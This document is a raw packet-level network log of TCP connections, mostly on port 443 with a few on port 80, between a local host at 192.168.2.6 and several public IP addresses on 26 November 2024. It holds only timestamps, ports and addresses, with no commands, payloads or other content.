Nov 26, 2024 00:25:24.043627024 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.043669939 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.044945955 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.051217079 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.051279068 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.051301003 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.057431936 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.057490110 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.057513952 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.063913107 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.063966990 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.063991070 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.069437981 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.069489002 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.069513083 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.075336933 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.075383902 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.075406075 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.081334114 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.081387043 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.081409931 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.088701963 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.088753939 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.088778019 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.101356983 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.101412058 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.101437092 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.114042997 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.114099979 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.114123106 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.125266075 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.125343084 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.125360966 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.125392914 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.125436068 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.127547026 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.135571003 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.135679007 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.135704041 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.135876894 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.135925055 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.135977030 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.759975910 CET	49751	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.760094881 CET	443	49751	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.760205030 CET	49751	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.760428905 CET	49751	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.760469913 CET	443	49751	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.809331894 CET	443	49741	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:24.810272932 CET	49741	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:24.810300112 CET	443	49741	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:24.810822010 CET	49741	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:24.810827971 CET	443	49741	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:24.960660934 CET	443	49743	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:24.961354017 CET	49743	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:24.961384058 CET	443	49743	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:24.962022066 CET	49743	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:24.962028980 CET	443	49743	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.036534071 CET	443	49744	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.037103891 CET	49744	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.037118912 CET	443	49744	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.037652016 CET	49744	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.037658930 CET	443	49744	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.066185951 CET	443	49745	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.066667080 CET	49745	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.066690922 CET	443	49745	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.067233086 CET	49745	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.067241907 CET	443	49745	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.265386105 CET	443	49741	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.265469074 CET	443	49741	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.265537977 CET	49741	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.266704082 CET	49741	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.266719103 CET	443	49741	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.266757011 CET	49741	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.266762972 CET	443	49741	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.274712086 CET	49753	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.274756908 CET	443	49753	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.274813890 CET	49753	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.275109053 CET	49753	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.275120020 CET	443	49753	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.430864096 CET	443	49743	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.430936098 CET	443	49743	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.430980921 CET	49743	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.431320906 CET	49743	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.431320906 CET	49743	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.431327105 CET	443	49743	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.431335926 CET	443	49743	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.435728073 CET	49755	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.435754061 CET	443	49755	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.435826063 CET	49755	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.435971022 CET	49755	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.435981989 CET	443	49755	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.527443886 CET	443	49745	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.527513027 CET	443	49745	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.527617931 CET	49745	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.527916908 CET	49745	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.527932882 CET	443	49745	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.527951002 CET	49745	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.527957916 CET	443	49745	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.532135963 CET	49756	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.532191992 CET	443	49756	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.532269955 CET	49756	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.532447100 CET	49756	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.532460928 CET	443	49756	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.535018921 CET	443	49744	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.535079956 CET	443	49744	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.535134077 CET	49744	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.535391092 CET	49744	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.535409927 CET	443	49744	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.535459995 CET	49744	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.535468102 CET	443	49744	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.538252115 CET	49757	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.538271904 CET	443	49757	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.538360119 CET	49757	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.538500071 CET	49757	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.538508892 CET	443	49757	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.547342062 CET	49758	443	192.168.2.6	4.245.163.56
Nov 26, 2024 00:25:25.547370911 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:25.547454119 CET	49758	443	192.168.2.6	4.245.163.56
Nov 26, 2024 00:25:25.549637079 CET	49758	443	192.168.2.6	4.245.163.56
Nov 26, 2024 00:25:25.549652100 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:25.649139881 CET	49759	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:25.649182081 CET	443	49759	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:25.649331093 CET	49759	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:25.652323008 CET	49759	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:25.652348042 CET	443	49759	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:25.839745998 CET	443	49746	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.840559006 CET	49746	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.840581894 CET	443	49746	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:25.841244936 CET	49746	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:25.841249943 CET	443	49746	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:26.287961960 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:26.288322926 CET	49763	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:26.311321974 CET	443	49746	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:26.311394930 CET	443	49746	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:26.311568975 CET	49746	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:26.311688900 CET	49746	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:26.311712980 CET	443	49746	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:26.311723948 CET	49746	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:26.311729908 CET	443	49746	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:26.314939976 CET	49764	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:26.314977884 CET	443	49764	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:26.315052032 CET	49764	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:26.315282106 CET	49764	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:26.315296888 CET	443	49764	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:26.409586906 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:26.409600019 CET	80	49763	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:26.409707069 CET	49763	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:26.409961939 CET	49763	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:26.502444983 CET	443	49751	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:26.502948999 CET	49751	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:26.502974033 CET	443	49751	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:26.503329039 CET	443	49751	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:26.503696918 CET	49751	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:26.503772020 CET	443	49751	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:26.531631947 CET	80	49763	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:26.555358887 CET	49751	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:27.123442888 CET	443	49753	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.124264002 CET	49753	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.124293089 CET	443	49753	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.124814987 CET	49753	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.124821901 CET	443	49753	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.130672932 CET	443	49759	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:27.130769014 CET	49759	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:27.132520914 CET	49759	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:27.132530928 CET	443	49759	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:27.132883072 CET	443	49759	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:27.175879955 CET	49759	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:27.219333887 CET	443	49759	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:27.222527027 CET	443	49755	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.223084927 CET	49755	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.223094940 CET	443	49755	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.223603010 CET	49755	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.223608017 CET	443	49755	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.292435884 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:27.292520046 CET	49758	443	192.168.2.6	4.245.163.56
Nov 26, 2024 00:25:27.294718981 CET	49758	443	192.168.2.6	4.245.163.56
Nov 26, 2024 00:25:27.294724941 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:27.294964075 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:27.316167116 CET	443	49756	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.316605091 CET	49756	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.316616058 CET	443	49756	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.317528009 CET	49756	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.317533016 CET	443	49756	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.323689938 CET	443	49757	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.324064016 CET	49757	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.324073076 CET	443	49757	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.324482918 CET	49757	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.324487925 CET	443	49757	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.336705923 CET	49758	443	192.168.2.6	4.245.163.56
Nov 26, 2024 00:25:27.358886003 CET	49758	443	192.168.2.6	4.245.163.56
Nov 26, 2024 00:25:27.399336100 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:27.594014883 CET	443	49753	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.594134092 CET	443	49753	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.594194889 CET	49753	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.594472885 CET	49753	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.594496965 CET	443	49753	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.594510078 CET	49753	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.594515085 CET	443	49753	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.598017931 CET	49765	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.598038912 CET	443	49765	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.598145962 CET	49765	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.598548889 CET	49765	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.598563910 CET	443	49765	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.663404942 CET	443	49759	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:27.663618088 CET	443	49759	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:27.663671017 CET	49759	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:27.663706064 CET	443	49759	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:27.663717985 CET	49759	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:27.663734913 CET	443	49759	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:27.690001011 CET	443	49755	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.690074921 CET	443	49755	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.690186024 CET	49755	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.690376997 CET	49755	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.690391064 CET	443	49755	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.690401077 CET	49755	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.690407991 CET	443	49755	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.693295002 CET	49767	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.693315029 CET	443	49767	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.693514109 CET	49767	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.693670034 CET	49767	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.693684101 CET	443	49767	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.696868896 CET	49768	443	192.168.2.6	172.217.17.78
Nov 26, 2024 00:25:27.696896076 CET	443	49768	172.217.17.78	192.168.2.6
Nov 26, 2024 00:25:27.696954012 CET	49768	443	192.168.2.6	172.217.17.78
Nov 26, 2024 00:25:27.697244883 CET	49768	443	192.168.2.6	172.217.17.78
Nov 26, 2024 00:25:27.697257042 CET	443	49768	172.217.17.78	192.168.2.6
Nov 26, 2024 00:25:27.701319933 CET	49769	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:27.701359987 CET	443	49769	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:27.701500893 CET	49769	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:27.701842070 CET	49769	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:27.701857090 CET	443	49769	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:27.779895067 CET	443	49756	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.780078888 CET	443	49756	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.780421972 CET	49756	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.780452013 CET	49756	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.780468941 CET	443	49756	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.780482054 CET	49756	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.780489922 CET	443	49756	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.783770084 CET	49770	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.783852100 CET	443	49770	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.784004927 CET	49770	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.784162045 CET	49770	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.784183979 CET	443	49770	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.813075066 CET	443	49757	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.813174963 CET	443	49757	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.813348055 CET	49757	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.813513994 CET	49757	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.813522100 CET	443	49757	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.817106009 CET	49771	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.817123890 CET	443	49771	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.817444086 CET	49771	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.817548037 CET	49771	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:27.817559958 CET	443	49771	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:27.986701012 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:27.986725092 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:27.986732960 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:27.986742973 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:27.986773968 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:27.986810923 CET	49758	443	192.168.2.6	4.245.163.56
Nov 26, 2024 00:25:27.986824989 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:27.986844063 CET	49758	443	192.168.2.6	4.245.163.56
Nov 26, 2024 00:25:27.986865044 CET	49758	443	192.168.2.6	4.245.163.56
Nov 26, 2024 00:25:28.008060932 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:28.008136988 CET	49758	443	192.168.2.6	4.245.163.56
Nov 26, 2024 00:25:28.008147001 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:28.008157969 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:28.008207083 CET	49758	443	192.168.2.6	4.245.163.56
Nov 26, 2024 00:25:28.008368015 CET	49758	443	192.168.2.6	4.245.163.56
Nov 26, 2024 00:25:28.008393049 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:28.008409023 CET	49758	443	192.168.2.6	4.245.163.56
Nov 26, 2024 00:25:28.008415937 CET	443	49758	4.245.163.56	192.168.2.6
Nov 26, 2024 00:25:28.165632010 CET	443	49764	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:28.168416023 CET	49764	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:28.168431997 CET	443	49764	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:28.169167995 CET	49764	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:28.169173002 CET	443	49764	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:28.337651014 CET	80	49763	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:28.337717056 CET	49763	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:28.719374895 CET	49763	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:28.771207094 CET	49751	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:28.771507025 CET	49768	443	192.168.2.6	172.217.17.78
Nov 26, 2024 00:25:28.890538931 CET	443	49764	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:28.890610933 CET	443	49764	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:28.890732050 CET	49764	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:28.892422915 CET	80	49763	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:28.953567028 CET	49764	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:28.953567028 CET	49764	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:28.953594923 CET	443	49764	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:28.953607082 CET	443	49764	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:28.960010052 CET	49772	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:28.960069895 CET	443	49772	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:28.960256100 CET	49772	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:28.960505962 CET	49772	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:28.960525036 CET	443	49772	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:29.174949884 CET	443	49769	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:29.175046921 CET	49769	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:29.189723969 CET	49769	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:29.189742088 CET	443	49769	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:29.189979076 CET	443	49769	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:29.191956043 CET	49769	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:29.235337973 CET	443	49769	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:29.402692080 CET	443	49765	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:29.403249979 CET	49765	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:29.403266907 CET	443	49765	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:29.403803110 CET	49765	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:29.403809071 CET	443	49765	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:29.606328964 CET	443	49771	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:29.606914997 CET	49771	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:29.606933117 CET	443	49771	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:29.607455969 CET	49771	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:29.607460976 CET	443	49771	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:29.675637007 CET	80	49763	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:29.675704956 CET	49763	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:29.715707064 CET	443	49769	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:29.715979099 CET	443	49769	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:29.716150045 CET	49769	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:29.717093945 CET	49769	443	192.168.2.6	23.218.208.109
Nov 26, 2024 00:25:29.717113972 CET	443	49769	23.218.208.109	192.168.2.6
Nov 26, 2024 00:25:29.894429922 CET	443	49765	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:29.894495964 CET	443	49765	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:29.894654036 CET	49765	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:29.900738001 CET	49765	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:29.900753975 CET	443	49765	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:29.900765896 CET	49765	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:29.900772095 CET	443	49765	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:29.915513992 CET	49773	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:29.915534973 CET	443	49773	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:29.915674925 CET	49773	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:29.916346073 CET	49773	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:29.916358948 CET	443	49773	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:30.096493959 CET	443	49771	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:30.097083092 CET	443	49771	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:30.097244024 CET	49771	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:30.097270966 CET	49771	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:30.097282887 CET	443	49771	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:30.097294092 CET	49771	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:30.097306967 CET	443	49771	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:30.112885952 CET	49774	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:30.112916946 CET	443	49774	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:30.112973928 CET	49774	443	192.168.2.6	13.107.246.63
